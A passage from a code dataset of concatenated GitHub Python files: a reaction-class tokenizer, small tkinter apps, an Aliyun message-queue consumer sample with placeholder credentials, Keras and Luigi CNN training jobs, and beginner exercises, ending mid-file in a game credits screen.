detokenized, \"{tokenized_class}\", is probably not in the correct format.'\n )\n return splitted_class[-1]\n\n\ndef tokenize_class(detokenized_class: str) -> str:\n \"\"\"\n Function performing a tokenization of the reaction class used in the Transformer classification\n model. E.g. '1.2.3' -> '1 1.2 1.2.3'\n\n Args:\n detokenized_class: str to tokenize\n\n Raises:\n ValueError: if the input string format is not correct\n \"\"\"\n if detokenized_class == \"0\":\n return detokenized_class\n\n splitted_class = detokenized_class.split(\".\")\n if len(splitted_class) == 4 and len(detokenized_class.split(\" \")) == 3:\n # here the class is already tokenized\n return detokenized_class\n if len(splitted_class) != 3:\n raise ValueError(\n f'The class to be tokenized, \"{detokenized_class}\", is probably not in the correct format.'\n )\n a, b, _ = splitted_class\n return f\"{a} {a}.{b} {detokenized_class}\"\n\n\ndef tokenize_class_line(class_line: str, invalid_placeholder: str) -> str:\n try:\n return tokenize_class(class_line)\n except ValueError:\n logger.debug(f'Error when tokenizing the class \"{class_line}\"')\n return invalid_placeholder\n\n\ndef detokenize_class_line(class_line: str, invalid_placeholder: str) -> str:\n try:\n return detokenize_class(class_line)\n except ValueError:\n logger.debug(f'Error when detokenizing the class \"{class_line}\"')\n return invalid_placeholder\n\n\ndef detokenize_classification_file(\n input_file: PathLike, output_file: PathLike, invalid_placeholder: str = \"\"\n) -> None:\n raise_if_paths_are_identical(input_file, output_file)\n logger.info(f'Detokenizing \"{input_file}\" -> \"{output_file}\".')\n\n detokenized = (\n detokenize_class_line(line, invalid_placeholder)\n for line in iterate_lines_from_file(input_file)\n )\n dump_list_to_file(detokenized, output_file)\n\n\ndef tokenize_classification_file(\n input_file: PathLike, output_file: PathLike, invalid_placeholder: str = \"\"\n) -> None:\n raise_if_paths_are_identical(input_file, output_file)\n logger.info(f'Tokenizing \"{input_file}\" -> \"{output_file}\".')\n\n tokenized = (\n tokenize_class_line(line, invalid_placeholder)\n for line in iterate_lines_from_file(input_file)\n )\n dump_list_to_file(tokenized, output_file)\n\n\ndef classification_string_is_tokenized(classification_line: str) -> bool:\n \"\"\"\n Whether a classification line is tokenized or not.\n\n Args:\n classification_line: line to inspect\n\n Raises:\n ValueError: for errors in tokenization or detokenization\n \"\"\"\n detokenized = detokenize_class(classification_line)\n tokenized = tokenize_class(detokenized)\n return classification_line == tokenized\n\n\ndef classification_file_is_tokenized(filepath: PathLike) -> bool:\n \"\"\"\n Whether a file contains tokenized classes or not.\n '1.2.3' -> '1 1.2 1.2.3'\n\n By default, this looks at the first non-empty line of the file only!\n\n Raises:\n ValueError: for errors in tokenization or detokenization\n RuntimeError: for empty files or files with empty lines only.\n\n Args:\n filepath: path to the file.\n \"\"\"\n for line in iterate_lines_from_file(filepath):\n # Ignore empty lines\n if line == \"\":\n continue\n return classification_string_is_tokenized(line)\n raise RuntimeError(\n f'Could not determine whether \"{filepath}\" is class-tokenized: empty lines only.'\n )\n","repo_name":"rxn4chemistry/rxn-metrics","sub_path":"src/rxn/metrics/tokenize_file.py","file_name":"tokenize_file.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73280519731","text":"#!/usr/bin/env python3\n\n\ndef menus():\n \"\"\"\n :return: a dict for showing menu's title, corresponding answer and the flag that quit from the program if it's True\n \"\"\"\n return {\n 1: {\n 'title': 'List the best musical group ever',\n 'answer': 'The Beatles are the best ever',\n 'quit': False\n },\n 2: {\n 'title': 'List the best sports team ever',\n 'answer': 'The Cubs are the best ever',\n 'quit': False\n },\n 3: {\n 'title': 'Quit',\n 'answer': 'OK! Hope you learned something.',\n 'quit': True\n }\n }\n\n\ndef show_main_menu():\n \"\"\"Showing main menu by menus\"\"\"\n showing_menus = menus()\n print('MAIN MENU')\n for i in range(1, len(showing_menus) + 1):\n title = showing_menus[i]['title']\n print(f'{i}. - {title}')\n\n\ndef main():\n show_main_menu()\n\n showing_menus = menus()\n while True:\n try:\n select = int(input('Enter the number for your choice:'))\n\n if select in showing_menus:\n answer = showing_menus[select]['answer']\n quit = showing_menus[select]['quit']\n print(answer)\n if quit:\n break\n else:\n print('That’s not one of the choices. Try again.')\n except:\n print('That’s not one of the choices. Try again.')\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"billyean/pyEx","sub_path":"sd/module3/BCE_3_3.py","file_name":"BCE_3_3.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14253051564","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport pandas as pd\nimport numpy as np\n\ndef csvPlot(frame, root):\n global filnavn\n filnavn = ''\n for widget in frame.winfo_children():\n widget.destroy()\n tk.Label(frame, text='Aanderaa', font='Helvetica 18 bold').pack(side=tk.TOP)\n tk.Label(frame, text='Plot csv').pack(side=tk.TOP, anchor=tk.W)\n\n menuFrame = tk.Frame(frame)\n menuFrame.pack(side=tk.TOP, anchor=tk.W)\n\n velMappuBtn = tk.Button(menuFrame, text='Vel Fíl', command=lambda: velFil())\n velMappuBtn.pack(side=tk.LEFT)\n\n teknaBtn = tk.Button(menuFrame, text='Tekna', command=lambda: tekna(fig, canvas))\n teknaBtn.pack(side=tk.LEFT)\n\n fig = Figure(figsize=(12, 8), dpi=100)\n plot_frame = tk.Frame(frame, borderwidth=1, highlightbackground=\"green\", highlightcolor=\"green\", highlightthickness=1)\n plot_frame.pack(fill=tk.BOTH, expand=True, side=tk.LEFT, anchor=tk.N)\n canvas = FigureCanvasTkAgg(fig, master=plot_frame)\n\ndef tekna(fig, canvas):\n fig.clf()\n ax = fig.add_subplot(111)\n ax.plot([1, 2, 3])\n global filnavn\n data = pd.read_csv(filnavn, sep='\\t', header=None)\n csvData = []\n tmp = data[0]\n print(tmp[0])\n thisTimestamp = tmp[0]\n thisRow = [tmp[0]]\n del tmp\n for item in data.iterrows(): # Ger dataframe við col\n itemting = item[1]\n if thisTimestamp != itemting[0]:\n thisTimestamp = itemting[0]\n csvData.append(thisRow)\n thisRow = []\n thisRow.append(itemting[0])\n thisRow.append(itemting[2])\n # Finn Col lables\n header = [\"Date/Time\"]\n for item in data.iterrows():\n tmp = item[1]\n if str(tmp[1]) not in header:\n header.append(str(tmp[1]))\n else:\n break\n\n df = pd.DataFrame(csvData)\n df.to_csv('Kort_Data/test.csv', index=False)\n #print(csvData)\n canvas.draw()\n canvas.get_tk_widget().pack(fill=tk.BOTH, expand=1)\n print('done')\n\n\ndef velFil():\n global filnavn\n filnavn = filedialog.askopenfile(title='Vel fíl', filetypes = ((\"txt Fílir\", \"*.txt\"), (\"csv Fílir\", \"*.csv\"), (\"all files\", \"*.*\"))).name\n print(filnavn)","repo_name":"Fiskaaling/FA_Ingestion_engine","sub_path":"Ingestion/Aanderaa/plotta_boyudata.py","file_name":"plotta_boyudata.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18407541193","text":"#!/usr/bin/env python\n# coding=utf8\n\nfrom mq_http_sdk.mq_exception import MQExceptionBase\nfrom mq_http_sdk.mq_consumer import *\nfrom mq_http_sdk.mq_client import *\n\n# 初始化 client\nmq_client = MQClient(\n # 设置HTTP接入域名(此处以公共云生产环境为例)\n \"${HTTP_ENDPOINT}\",\n # AccessKey 阿里云身份验证,在阿里云服务器管理控制台创建\n \"${ACCESS_KEY}\",\n # SecretKey 阿里云身份验证,在阿里云服务器管理控制台创建\n \"${SECRET_KEY}\"\n)\n# 所属的 Topic\ntopic_name = \"${TOPIC}\"\n# 您在控制台创建的 Consumer ID(Group ID)\ngroup_id = \"${GROUP_ID}\"\n# Topic所属实例ID,默认实例为空None\ninstance_id = \"${INSTANCE_ID}\"\n\nconsumer = mq_client.get_consumer(instance_id, topic_name, group_id)\n\n# 长轮询表示如果topic没有消息则请求会在服务端挂住3s,3s内如果有消息可以消费则立即返回\n# 长轮询时间3秒(最多可设置为30秒)\nwait_seconds = 3\n# 一次最多消费3条(最多可设置为16条)\nbatch = 3\nprint((\"%sConsume And Ak Message From Topic%s\\nTopicName:%s\\nMQConsumer:%s\\nWaitSeconds:%s\\n\" \\\n % (10 * \"=\", 10 * \"=\", topic_name, group_id, wait_seconds)))\nwhile True:\n try:\n # 长轮询消费消息\n recv_msgs = consumer.consume_message(batch, wait_seconds)\n for msg in recv_msgs:\n print((\"Receive, MessageId: %s\\nMessageBodyMD5: %s \\\n \\nMessageTag: %s\\nConsumedTimes: %s \\\n \\nPublishTime: %s\\nBody: %s \\\n \\nNextConsumeTime: %s \\\n \\nReceiptHandle: %s \\\n \\nProperties: %s\\n\" % \\\n (msg.message_id, msg.message_body_md5,\n msg.message_tag, msg.consumed_times,\n msg.publish_time, msg.message_body,\n msg.next_consume_time, msg.receipt_handle, msg.properties)))\n print(msg.get_property(\"哈哈哈\"))\n except MQExceptionBase as e:\n if e.type == \"MessageNotExist\":\n print((\"No new message! RequestId: %s\" % e.req_id))\n continue\n\n print((\"Consume Message Fail! Exception:%s\\n\" % e))\n time.sleep(2)\n continue\n\n # msg.next_consume_time前若不确认消息消费成功,则消息会重复消费\n # 消息句柄有时间戳,同一条消息每次消费拿到的都不一样\n try:\n receipt_handle_list = [msg.receipt_handle for msg in recv_msgs]\n consumer.ack_message(receipt_handle_list)\n print((\"Ak %s Message Succeed.\\n\\n\" % len(receipt_handle_list)))\n except MQExceptionBase as e:\n print((\"\\nAk Message Fail! Exception:%s\" % e))\n # 某些消息的句柄可能超时了会导致确认不成功\n if e.sub_errors:\n for sub_error in e.sub_errors:\n print((\"\\tErrorHandle:%s,ErrorCode:%s,ErrorMsg:%s\" % \\\n (sub_error[\"ReceiptHandle\"], sub_error[\"ErrorCode\"], sub_error[\"ErrorMessage\"])))\n","repo_name":"aliyunmq/mq-http-samples","sub_path":"python/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"21"} +{"seq_id":"41680937163","text":"#!/usr/bin/env python3\n\n# https://thispointer.com/python-add-a-column-to-an-existing-csv-file/\nfrom csv import writer\nfrom csv import reader\n\n# Add a column with same values to an existing CSV file\n\ndefault_text = 'Some useful text'\n# Open the input_file in read mode and output_file in write mode\nwith open('input.csv', 'r') as read_obj, \\\n open('output_1.csv', 'w', newline='') as write_obj:\n # Create a csv.reader object from the input file object\n csv_reader = reader(read_obj)\n # Create a csv.writer object from the output file object\n csv_writer = writer(write_obj)\n # Read each row of the input csv file as list\n for row in csv_reader:\n # Append the default text in the row / list\n row.append(default_text)\n # Add the updated row / list to the output file\n csv_writer.writerow(row)\n\n\n","repo_name":"MD-khan/100-days-python-with-udeny","sub_path":"day_25_csv/add_new_columns/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6821544494","text":"from tensorflow.keras import layers, models, datasets\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\ncifar10 = datasets.cifar10\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\ny_train = tf.keras.utils.to_categorical(y_train, 10)\ny_test = tf.keras.utils.to_categorical(y_test, 10)\n\nAlexnet = models.Sequential(\n [\n layers.experimental.preprocessing.Resizing(\n 227, 227, interpolation='bilinear', input_shape=x_train.shape[1:]),\n\n layers.Conv2D(filters=96, kernel_size=(11, 11), strides=(\n 4, 4), input_shape=(224, 224, 3), activation='relu'),\n layers.MaxPool2D(pool_size=(3, 3), strides=(2, 2)),\n layers.BatchNormalization(),\n\n layers.Conv2D(filters=256, kernel_size=(5, 5), strides=(\n 1, 1), activation='relu', padding='same'),\n layers.MaxPool2D(pool_size=(3, 3), strides=(2, 2)),\n layers.BatchNormalization(),\n\n layers.Conv2D(filters=384, kernel_size=(3, 3), strides=(\n 1, 1), activation='relu', padding='same'),\n layers.Conv2D(filters=384, kernel_size=(3, 3), strides=(\n 1, 1), activation='relu', padding='same'),\n layers.Conv2D(filters=256, kernel_size=(3, 3), strides=(\n 1, 1), activation='relu', padding='same'),\n layers.MaxPool2D(pool_size=(3, 3), strides=(2, 2)),\n layers.BatchNormalization(),\n\n layers.Flatten(),\n layers.Dense(4096, activation='relu'),\n layers.Dropout(.5),\n layers.Dense(4096, activation='relu'),\n layers.Dropout(.5),\n layers.Dense(10, activation='softmax')\n ]\n)\n\nAlexnet.compile(optimizer=tf.optimizers.SGD(learning_rate=0.001),\n loss='sparse_categorical_crossentropy', metrics=['accuracy'])\nAlexnet.summary()\n\nAlexnet.fit(x_train, y_train, epochs=1)\n","repo_name":"seunggihong/Conv-Flow","sub_path":"tensorflow/alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34104492890","text":"import luigi\nimport os\nimport numpy as np\nimport json\nimport pickle\n\nfrom keras.models import load_model\n\nfrom config import DATA_ROOT, CNN_CONFIG\n\nfrom jobs.preprocess import AugmentData, PreprocessRawData\nfrom estimators import cnn\n\n\nclass KerasCNNFitModel(luigi.Task):\n \"\"\"\n Fir the Keras Convolutional Neural Network\n \"\"\"\n\n def requires(self):\n return [\n AugmentData(),\n PreprocessRawData(),\n ]\n\n def output(self):\n return luigi.LocalTarget(os.path.join(DATA_ROOT, 'pointers', 'KerasCNNFitModel.json'))\n\n def run(self):\n\n with self.input()[0].open('r') as path_file:\n paths = json.load(path_file)\n\n X_aug_train = np.load(paths['X_aug_train'])\n y_aug_train = np.load(paths['y_aug_train'])\n\n with self.input()[1].open('r') as path_file:\n paths = json.load(path_file)\n\n X_test = np.load(paths['X_test'])\n y_test = np.load(paths['y_test'])\n\n history, model = cnn.train_model(X_aug_train, y_aug_train, X_test, y_test,\n epochs=CNN_CONFIG['epochs'], batch_size=CNN_CONFIG['batch_size'])\n\n paths = {\n 'history': os.path.join(DATA_ROOT, 'cnn_history.p'),\n 'model': os.path.join(DATA_ROOT, 'cnn.h5'),\n }\n\n with open(paths['history'], 'wb') as history_file:\n pickle.dump(history.history, history_file)\n\n model.save(paths['model'])\n\n with self.output().open('w') as f:\n json.dump(paths, f)\n\n\nclass KerasCNNExtractFeatureModel(luigi.Task):\n \"\"\"\n Save the feature model from the full model\n \"\"\"\n\n def requires(self):\n return [\n KerasCNNFitModel(),\n ]\n\n def output(self):\n return luigi.LocalTarget(os.path.join(DATA_ROOT, 'cnn-feature-model.h5'))\n\n def run(self):\n\n with self.input()[0].open('r') as path_file:\n paths = json.load(path_file)\n\n model = load_model(paths['model'])\n feature_model = cnn.get_feature_extraction_model(model)\n\n feature_model.save(self.output().path)\n\n\nclass KerasCNNExtractFeatures(luigi.Task):\n \"\"\"\n Extract features from the trained convolutional neural network\n \"\"\"\n\n def requires(self):\n return [\n KerasCNNExtractFeatureModel(),\n AugmentData(),\n PreprocessRawData(),\n ]\n\n def output(self):\n return luigi.LocalTarget(os.path.join(DATA_ROOT, 'pointers', 'KerasCNNExtractFeatures.json'))\n\n def run(self):\n\n feature_model = load_model(self.input()[0].path)\n\n with self.input()[1].open('r') as path_file:\n paths = json.load(path_file)\n\n X_aug_train = np.load(paths['X_aug_train'])\n\n with self.input()[2].open('r') as path_file:\n paths = json.load(path_file)\n\n X_test = np.load(paths['X_test'])\n\n X_aug_train_features = feature_model.predict(X_aug_train)\n X_test_features = feature_model.predict(X_test)\n\n paths = {\n 'X_aug_train_features': os.path.join(DATA_ROOT, 'X_aug_train_features.npy'),\n 'X_test_features': os.path.join(DATA_ROOT, 'X_test_features.npy'),\n }\n\n np.save(paths['X_aug_train_features'], X_aug_train_features)\n np.save(paths['X_test_features'], X_test_features)\n\n with self.output().open('w') as f:\n json.dump(paths, f)\n","repo_name":"tom812191/mnist-classification","sub_path":"jobs/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37027699756","text":"from art import logo\nimport random\n\nx = random.randint(1,100)\n\ndef play_game():\n print(logo)\n print(\"Welcome to the Number Guessing Game ! \\nI'm thinking of a number between 1 and 100.\\nPssst, the correct answer is 93 \")\n choose = input(\"Choose a difficulty. Type 'easy' or 'hard': \" )\n n = 1\n if choose == 'easy':\n n = 10\n elif choose == 'hard':\n n = 5\n for i in range(n):\n print(f\"You have {n-i} attempts remaining to guess the number.\")\n your_guess = int(input(\"Make a guess: \"))\n if your_guess > x:\n print(\"Too high.\")\n elif your_guess < x:\n print(\"Too low.\")\n else:\n print(\"Exacly ! Correct Answer: \", your_guess)\n break\n if your_guess != x:\n print(\"You've run out of guesses, you lose !\")\n if input(\"Do you want to continue playing game ? Type 'yes' to continue, type 'no' to endgame: \") == 'yes':\n play_game()\nplay_game()","repo_name":"chickenhihi/Project2_Guess_Number","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21555172058","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nNMax = 91\r\nintro = int(input().rstrip())\r\ntable = [0] * (NMax+1)\r\ntable[1] = 1\r\ntable[2] = 1\r\n\r\ndef fibo(n):\r\n if 2 <= n <= NMax:\r\n if table[n] == 0:\r\n table[n] = fibo(n-1) + fibo(n-2)\r\n return table[n]\r\n # else:\r\n # return fibo(n-1) +fibo(n-2)\r\n else:\r\n return 0\r\nprint(fibo(intro+1))","repo_name":"dearmysolitude/BaekJoon","sub_path":"백준/Bronze/2748. 피보나치 수 2/피보나치 수 2.py","file_name":"피보나치 수 2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13722790604","text":"import tkinter as tk\r\nfrom PIL import ImageTk, Image\r\n\r\ndef AbrirImagen(archivo, DiferenciaResolucion):\r\n\r\n\t\tImagenReajustada = Image.open(archivo)\t\t# Abrir Imagen\r\n\r\n\t\tAncho, Altura = ImagenReajustada.size\t\t\r\n\t\tAncho = round(Ancho*DiferenciaResolucion)\r\n\t\tAltura = round(Altura*DiferenciaResolucion)\r\n\t\tMedidas = Ancho, Altura\r\n\r\n\t\tImagenReajustada = ImagenReajustada.resize(Medidas, Image.ANTIALIAS) # Ajustar el tamaño de la imagen\r\n\r\n\t\tImagenReajustada = ImageTk.PhotoImage(ImagenReajustada)\r\n\r\n\t\treturn ImagenReajustada\r\n\r\ndef AbrirImagenEX(archivo, DiferenciaResolucion):\r\n\r\n\t\tImagenReajustada = Image.open(archivo)\r\n\r\n\t\tAncho, Altura = ImagenReajustada.size\r\n\t\tAncho = round(Ancho*DiferenciaResolucion)\r\n\t\tAltura = round(Altura*DiferenciaResolucion)\r\n\t\tMedidas = Ancho, Altura\r\n\r\n\t\tImagenReajustada = ImagenReajustada.resize(Medidas, Image.ANTIALIAS)\r\n\r\n\t\tImagenReajustada = ImagenReajustada.convert(\"RGBA\") # Eliminar el fondo negro que aparece en algunas imagenes\r\n\t\tDatas = ImagenReajustada.getdata()\r\n\r\n\t\tnewData = []\r\n\r\n\t\tfor item in Datas:\r\n\t\t\tif item[0] == 255 and item[1] == 255 and item[2] == 255:\r\n\t\t\t\tnewData.append((255, 255, 255, 0))\r\n\t\t\telse:\r\n\t\t\t\tnewData.append(item)\r\n\t\t\t\t\r\n\t\tImagenReajustada.putdata(newData)\r\n\r\n\t\tImagenReajustada = ImageTk.PhotoImage(ImagenReajustada)\r\n\r\n\t\treturn ImagenReajustada\r\n\r\ndef Redondear(Valor, DiferenciaResolucion):\r\n\treturn round(Valor*DiferenciaResolucion)\r\n\r\nclass Creditos():\r\n\r\n\tdef __init__(self, DR, idioma, raiz = None):\r\n\r\n\t\t# Imágenes\r\n\r\n\t\tself.DR = DR\r\n\t\tself.Idioma = idioma\r\n\r\n\t\tself.Google_img = AbrirImagen(\"Imagenes/Google.png\", self.DR)\r\n\t\tself.Youtube_img = AbrirImagen(\"Imagenes/Youtube.png\", self.DR)\r\n\t\tself.Yo_img = AbrirImagen(\"Imagenes/Yo.png\", self.DR)\r\n\t\tself.Vicente_img = AbrirImagen(\"Imagenes/Vicente.png\", self.DR)\r\n\t\tself.Pildoras_img = AbrirImagen(\"Imagenes/PildorasInformaticas.png\", self.DR)\r\n\t\tself.Discord_img = AbrirImagen(\"Imagenes/Discord.png\", self.DR)\r\n\t\tself.Colegio_img = AbrirImagen(\"Imagenes/Colegio.png\", self.DR)\r\n\r\n\t\tif self.Idioma == \"español\":\r\n\t\t\tCreditos_str = \"Créditos\"\r\n\t\t\tProgramador_str = \"Programador:\"\r\n\t\t\tArtista_str = \"Artista gráfico:\"\r\n\t\t\tMusica_str = \"Musica y audio:\"\r\n\t\t\tTester_str = \"Beta Tester:\"\r\n\t\t\tProgramador_info_str = \"Jaime Sepúlveda\"\r\n\t\t\tArtista_info_str = \"70% Yo y 30% Internet\"\r\n\t\t\tMusica_info_str = \"Youtube\"\r\n\t\t\tTester_info_str = \"Vicente Sepúlveda\"\r\n\t\t\tApoyo_str = \"Muchas gracias Martín, Ivan, Jean, Alejandro,\\nNicolás, Alonso, y todos los demás del discord.\"\r\n\t\t\tProfesor_str = \"Gracias profesor Sebastían por hacer este electivo.\"\r\n\t\t\tPildoras_str = \"Muchas gracias Pildoras Informáticas por\\ncrear un curso de Python en español y gratis.\"\r\n\t\t\tVolver_str = \"Volver\"\r\n\t\t\tAnterior_str = \"Anterior\"\r\n\t\t\tSiguiente_str = \"Siguiente\"\r\n\r\n\t\telif self.Idioma == \"english\":\r\n\t\t\tCreditos_str = \"Credits\"\r\n\t\t\tProgramador_str = \"Developer:\"\r\n\t\t\tArtista_str = \"Graphic artist:\"\r\n\t\t\tMusica_str = \"Music and audio:\"\r\n\t\t\tTester_str = \"Beta Tester:\"\r\n\t\t\tProgramador_info_str = \"Jaime Sepúlveda\"\r\n\t\t\tArtista_info_str = \"70% Me and 30% Internet\"\r\n\t\t\tMusica_info_str = \"Youtube\"\r\n\t\t\tTester_info_str = \"Vicente Sepúlveda\"\r\n\t\t\tApoyo_str = \"Thank you very much Martín, Ivan, Jean, Alejandro,\\nNicolás, Alonso, and everyone else from discord.\"\r\n\t\t\tProfesor_str = \"Thanks Teacher Sebastían for teaching this class.\"\r\n\t\t\tPildoras_str = \"Thanks a lot Pildoras Informáticas for\\ncreating a free Python Course in spanish.\"\r\n\t\t\tVolver_str = \"Return\"\r\n\t\t\tAnterior_str = \"Previous\"\r\n\t\t\tSiguiente_str = \"Next\"\r\n\r\n\t\tself.Creditos_Frame = tk.Frame(raiz, width = 2050, height = 420)\r\n\t\tself.Creditos_Frame.pack()\r\n\r\n\t\tself.Botones_Frame = tk.Frame(raiz, width = 2050, height = 420)\r\n\t\tself.Botones_Frame.pack()\r\n\r\n\t\tself.Creditos_label = tk.Label(self.Creditos_Frame, text = Creditos_str, font = (\"Arial\", Redondear(60, self.DR)))\r\n\r\n\t\tself.Creditos_Titulo_Frame = tk.Frame(self.Creditos_Frame)\r\n\t\tself.Programador_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#9FE7FF\")\r\n\t\tself.Artista_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#AFFF9F\")\r\n\t\tself.Musica_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#FFB2B2\")\r\n\t\tself.Tester_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#FFFFB7\")\r\n\t\tself.Apoyo_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#FFFFB7\")\r\n\t\tself.Profesor_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#FFDA9E\")\r\n\t\tself.Pildoras_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#C6FFBB\")\r\n\r\n\t\tself.Creditos_Titulo_Frame.grid(row = 0, column = 0)\r\n\r\n\t\tself.Programador_label = tk.Label(self.Programador_Frame, text = Programador_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#9FE7FF\")\r\n\t\tself.Artista_label = tk.Label(self.Artista_Frame, text = Artista_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#AFFF9F\")\r\n\t\tself.Musica_label = tk.Label(self.Musica_Frame, text = Musica_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#FFB2B2\")\r\n\t\tself.Tester_label = tk.Label(self.Tester_Frame, text = Tester_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#FFFFB7\")\r\n\r\n\t\tself.Programador_info_label = tk.Label(self.Programador_Frame, text = Programador_info_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#9FE7FF\")\r\n\t\tself.Artista_info_label = tk.Label(self.Artista_Frame, text = Artista_info_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#AFFF9F\")\r\n\t\tself.Musica_info_label = tk.Label(self.Musica_Frame, text = Musica_info_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#FFB2B2\")\r\n\t\tself.Tester_info_label = tk.Label(self.Tester_Frame, text = Tester_info_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#FFFFB7\")\r\n\t\tself.Apoyo_info_label = tk.Label(self.Apoyo_Frame, text = Apoyo_str,\r\n\t\t\tfont = (\"Arial\", Redondear(28, self.DR)), bg = \"#FFFFB7\", anchor = \"center\")\r\n\r\n\t\tself.Profesor_info_label = tk.Label(self.Profesor_Frame, text = Profesor_str, font = (\"Arial\", Redondear(28, self.DR)), bg = \"#FFDA9E\", anchor = \"center\")\r\n\t\tself.Pildoras_info_label = tk.Label(self.Pildoras_Frame, text = Pildoras_str, font = (\"Arial\", Redondear(28, self.DR)), bg = \"#C6FFBB\", anchor = \"center\")\r\n\r\n\t\tself.Volver_button = tk.Button(self.Botones_Frame, text = Volver_str, font = (\"Arial\", Redondear(30, self.DR)), command = lambda:self.Destruir(), bd = Redondear(6, self.DR))\r\n\r\n\t\tself.Anterior_button = tk.Button(self.Botones_Frame, text = Anterior_str, font = (\"Arial\", Redondear(30, self.DR)), command = lambda:self.CambiarPagina(1), bd = Redondear(6, self.DR))\r\n\r\n\t\tself.Siguiente_button = tk.Button(self.Botones_Frame, text = Siguiente_str, font = (\"Arial\", Redondear(30, self.DR)), command = lambda:self.CambiarPagina(2), bd = Redondear(6, self.DR))\r\n\r\n\t\tself.Creditos_label.grid(row = 0, column = 0, pady = (Redondear(10, self.DR),0), columnspan = 2)\r\n\r\n\t\tself.Creditos_Frame.after(0, lambda:self.CambiarPagina(1))\r\n\r\n\tdef CambiarPagina(self, pagina):\r\n\r\n\t\tif pagina == 1:\r\n\r\n\t\t\ttry:\r\n\t\t\t\tself.Apoyo_Frame.grid_forget()\r\n\t\t\t\tself.Profesor_Frame.grid_forget()\r\n\t\t\t\tself.Pildoras_Frame.grid_forget()\r\n\t\t\t\tself.Discord_label.grid_forget()\r\n\t\t\t\tself.Colegio_label.grid_forget()\r\n\t\t\t\tself.Pildoras_img_label.grid_forget()\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\r\n\t\t\tself.Anterior_button[\"state\"] = \"disabled\"\r\n\t\t\tself.Siguiente_button[\"state\"] = \"normal\"\r\n\r\n\t\t\tself.Programador_Frame.grid(row = 1, column = 0, pady = Redondear(20, self.DR), sticky = \"ew\")\r\n\t\t\tself.Artista_Frame.grid(row = 2, column = 0, sticky = \"ew\")\r\n\t\t\tself.Musica_Frame.grid(row = 3, column = 0, pady = Redondear(20, self.DR), sticky = \"ew\")\r\n\t\t\tself.Tester_Frame.grid(row = 4, column = 0, sticky = \"ew\")\r\n\r\n\t\t\tself.Volver_button.grid(row = 5, column = 1, pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Anterior_button.grid(row = 5, column = 0, pady = Redondear(20, self.DR))\r\n\t\t\tself.Siguiente_button.grid(row = 5, column = 2, pady = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Programador_label.grid(row = 0, column = 0, pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Artista_label.grid(row = 0, column = 0, pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Musica_label.grid(row = 0, column = 0, pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Tester_label.grid(row = 0, column = 0, pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Programador_info_label.grid(row = 0, column = 1, padx = Redondear(20, self.DR))\r\n\t\t\tself.Artista_info_label.grid(row = 0, column = 1, pady = Redondear(10, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Musica_info_label.grid(row = 0, column = 1, padx = Redondear(20, self.DR))\r\n\t\t\tself.Tester_info_label.grid(row = 0, column = 1, pady = Redondear(10, self.DR), padx = (Redondear(50, self.DR),0))\r\n\r\n\t\t\tself.Yo_label = tk.Label(self.Creditos_Frame, image = self.Yo_img)\r\n\t\t\tself.Yo_label.grid(row = 1, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Google_label = tk.Label(self.Creditos_Frame, image = 